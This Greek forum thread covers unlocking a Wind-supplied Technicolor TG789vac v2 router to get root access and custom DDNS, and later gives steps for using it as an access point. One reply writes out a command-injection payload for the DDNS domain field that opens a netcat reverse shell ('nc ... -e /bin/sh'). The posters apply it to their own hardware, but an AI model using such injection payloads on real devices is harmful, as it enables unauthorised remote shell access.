Προς το περιεχόμενο

Technicolor TG789vac v2


dj_takis

Προτεινόμενες αναρτήσεις

Χαιρετώ το φόρουμ. Η wind μου έστειλε το εν λόγω ρούτερ όταν αναβάθμισα σε 100άρα γραμμή. Με μια πρώτη ματιά καλό φαίνεται αλλά έχοντας καεί με τα σάπια ZTE που έστελνε πιο παλιά, έχω μια σχέση αποστάσεως με ότι στέλνει η συγκεκριμένη εταιρία. Διάβασα ότι τρέχει και openwrt, αλλά ένα κακό το οποίο με απασχολεί αρκετά, είναι ότι η μόνη υπηρεσία ddns που έχει είναι το dyndns,  και όχι το no-ip που διαθέτω εγώ. Υπάρχουν root κωδικοί, ώστε να ξεκλειδωθεί και να μπορέσουμε να περάσουμε μέσα διάφορα καλούδια; Αν γίνεται φυσικά. Ευχαριστώ προκαταβολικά.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δυστυχώς όχι. Δεν ξεκλειδώνει έτσι. (αν ξεκλειδώνει γενικώς.) Δεν παίρνει την εντολή όπως λέει ο οδηγός, οπότε στο cmd δεν αλλάζει κάτι. Όταν βάζω τα στοιχεία του noip μου λέει invalid value, οπότε γι' αυτό υπέθεσα ότι δεν υποστηρίζει κάτι άλλο εκτός από dyn. Σ' αφήνει να γράψεις ότι θες, αλλά στο save δεν το δέχεται. Κάποια άλλη ιδέα; Αν υπάρχει;

Χωρίς τίτλο.jpg

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημοσ. (επεξεργασμένο)

Δυστυχως τα technicolor τα θεωρω χειροτερα και απο τα zte, ακομη και απο noname modem-router. Παρε καλυτερα ενα tplink και παιρνα το lede και εισαι μια χαρα.

Επεξ/σία από M@dB0x
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δοκίμασε σε άλλα πεδία όπως diagnostics -> ping,

όλα αυτά με το openwrt έχουν πολλά vulnerabilities γενικά, και όλα ξεκλειδώνουν ακόμη και το 17.2...

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

6 ώρες πριν, M@dB0x είπε

Δυστυχως τα technicolor τα θεωρω χειροτερα και απο τα zte, ακομη και απο noname modem-router. Παρε καλυτερα ενα tplink και παιρνα το lede και εισαι μια χαρα.

Μη σου πω ότι κι εγώ σ' αυτό το συμπέρασμα καταλήγω... Είχα Tp-Link το w9980, και στη προσπάθειά μου να του περάσω LEDE το brickάρισα. Προσπάθησα να το επαναφέρω και τα έκανα χειρότερα, και μάλλον τώρα καπούτ μόνιμα.

6 ώρες πριν, spell1977 είπε

Δοκίμασε σε άλλα πεδία όπως diagnostics -> ping,

όλα αυτά με το openwrt έχουν πολλά vulnerabilities γενικά, και όλα ξεκλειδώνουν ακόμη και το 17.2...

Θα το δω φίλε μου, σ' ευχαριστώ. Ελπίζω να έχει απομείνει κανά exploit που δεν το έχουνε καλύψει. Εμένα έχει πάνω το 17.1

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

στη εντολή που βάζεις στο domain είδα ένα λάθος (/bin/sh2)...

η εντολή είναι

test.com;nc 192.168.1.2 1337 -e /bin/sh &

επίσης συmπλήρωσε όλα τα πεδία (password)

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

11 ώρες πριν, spell1977 είπε

στη εντολή που βάζεις στο domain είδα ένα λάθος (/bin/sh2)...

η εντολή είναι


test.com;nc 192.168.1.2 1337 -e /bin/sh &

επίσης συmπλήρωσε όλα τα πεδία (password)

Ναι, έχεις δίκιο. Δεν ξέρω πως έγινε αυτό, γιατί και στον οδηγό απ' όπου την αντέγραψα την σωστή εντολή δίνει. Παρ' όλα αυτά πάλι το ίδιο error δίνει. Δοκίμασα και στο ping όπως μου είπες, κι εκεί τζίφος. Δεν είχα χρόνο να το ψάξω και για άλλα πεδία. Θα το κάνω όμως. Αρχικά το δοκίμασα και με username-password, αν και δεν είχα ddns account, αλλά έφτιαξα μόνο και μόνο για να το δοκιμάσω. Απλά είδα ότι απέτυχε, και μετά το έκανα και χωρίς, απ' όπου και η φωτό.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 7 μήνες μετά...

Παιδιά έφτιαξα έναν οδηγό ξεκλειδώματος για το TG789vac v2 της wind

https://www.adslgr.com/forum/threads/1087939-%CE%9F%CE%B4%CE%B7%CE%B3%CF%8C%CF%82-%CE%9E%CE%B5%CE%BA%CE%BB%CE%B5%CE%B9%CE%B4%CF%8E%CE%BC%CE%B1%CF%84%CE%BF%CF%82-Technicolor-TG789vacV2-Wind-ISP-Greece

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 3 μήνες μετά...
Στις 13/1/2019 στις 4:05 ΜΜ, johnyn2005 είπε

Παιδιά έφτιαξα έναν οδηγό ξεκλειδώματος για το TG789vac v2 της wind

https://www.adslgr.com/forum/threads/1087939-Οδηγός-Ξεκλειδώματος-Technicolor-TG789vacV2-Wind-ISP-Greece

Ευχαριστώ πολύ για τον οδηγό φίλε μου. Άργησα να το δω αλλά έγινε με επιτυχία και το ρουτεράκι απογειώθηκε. Προτείνω να μπει κι εδώ ο οδηγός, και να μπει στην πρώτη σελίδα του thread. Και αν είναι και δυνατόν να γίνει και pinned.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 8 μήνες μετά...
Στις 13/1/2019 στις 4:05 ΜΜ, johnyn2005 είπε

Παιδιά έφτιαξα έναν οδηγό ξεκλειδώματος για το TG789vac v2 της wind

https://www.adslgr.com/forum/threads/1087939-Οδηγός-Ξεκλειδώματος-Technicolor-TG789vacV2-Wind-ISP-Greece

johnyn2005 να σου το φερω να το ξεκλειδωσεις με το αζημιωτο? [email protected]

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Μου ήρθε το router μαζί με την αναβάθμιση σε 100άρι, έχω και το W9970 v2 της TP Link, νομίζω ότι αυτό της Technicolor έχει αισθητά πιο δυνατό wifi στο σπίτι μου, στο σαλόνι που έπιανε πολύ λίγο το to link, αυτό δίνει κάτι 50άρια στο πιο δύσκολο σημείο και 92+ σε πιο νορμάλ μέρη του σαλονιού.

Το έχω βάλει σε OnePlus 6 στα 5 GHz, τα 2.4 δεν μου δίνουν ούτε τα 50 down, ακόμα και δίπλα στο router. Θα δοκιμάσω και με το TP link αύριο μεθαύριο γιατί είχα της wind πάνω, επειδή είχε βλάβη κατευθείαν μετά την αναβάθμιση σε 100.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • 1 μήνα μετά...
Δημοσ. (επεξεργασμένο)

Καλησπέρα

Μήπως ξέρει κανείς αν και πως μπορώ να κάνω το TG789vac Access Point;;

Χρησιμοποιήσω το H268N σαν modem (vdsl100 + voip) γιατι κλειδώνει καλύτερα στη γραμμή μου και παίζει σταθερά, ενω το TG789vac έχει καλύτερο σήμα WiFi
Το TG789vac v2 εχει μια θήρα πίσω που λέει WAN
Τι πρέπει να κάνω στις ρυθμίσεις του TG789vac για να το Access Point;;;
Ποια firmware το υποστηρίζει, εάν το υποστηρίζει

Ευχαριστώ

Επεξ/σία από Wagner669
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Για όποιον θέλει να το κάνει Access Point

Εαν το modem router που έχετε, έχει  IP 192.168.1.1 όπως το δικό μου

Ανοίγουμε τις ρυθμίσεις του ρουτερ που έχουμε για dsl και voip
Πάμε στις DHCP ρυθμίσεις
Ρυθμίζουμε να δίνει IP απο 192.168.1.10 εως το 192.168.1.250

Κατεβάζουμε τα αρχεία απο το πρώτο post
Κάνουμε firmware upgrade σε MST.TG789vac.v2-17.2.278-0901008.rbi
Restart

Συνδεόμαστε με καλώδιο στο TG789vacV2
Μπαίνουμε στις ρυθμίσεις
Φτιάχνουμε τις SSID για το 2.5G και το 5G (μετά το firmware upgrade θα χει τις Ιταλικές ρυθμίσεις)
Δίνουμε τον κωδικό που θέλουμε
Αλλάζουμε την IP του TG789vacV2 σε 192.168.1.254
Δίνουμε για DNS Server την IP του dsl ρουτερ 192.168.1.1

Στη κεντρική σελίδα επιλέγουμε το Gateway και επιλέγουμε Show Advanced Settings
Επιλέγουμε κάτω-κάτω το Configure Gateway (στη firmware της Wind δεν υπάρχει αυτή η επιλογή)
Επιλέγουμε Access Point mode
Apply
Restart

Συνδέουμε το TG789vacV2 και το router με μια απο τις 4 LAN που έχει πίσω
Ο Χ Ι στη WAN

Συνδεόμαστε ασύρματα και τσεκάρουμε αν δούλεψε

Σε μένα δούλεψε
Αν δεν δούλεψε σε εσάς, μη με βρίσετε πολύ :cool:

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε για να σχολιάσετε

Πρέπει να είστε μέλος για να αφήσετε σχόλιο

Δημιουργία λογαριασμού

Εγγραφείτε με νέο λογαριασμό στην κοινότητα μας. Είναι πανεύκολο!

Δημιουργία νέου λογαριασμού

Σύνδεση

Έχετε ήδη λογαριασμό; Συνδεθείτε εδώ.

Συνδεθείτε τώρα
  • Δημιουργία νέου...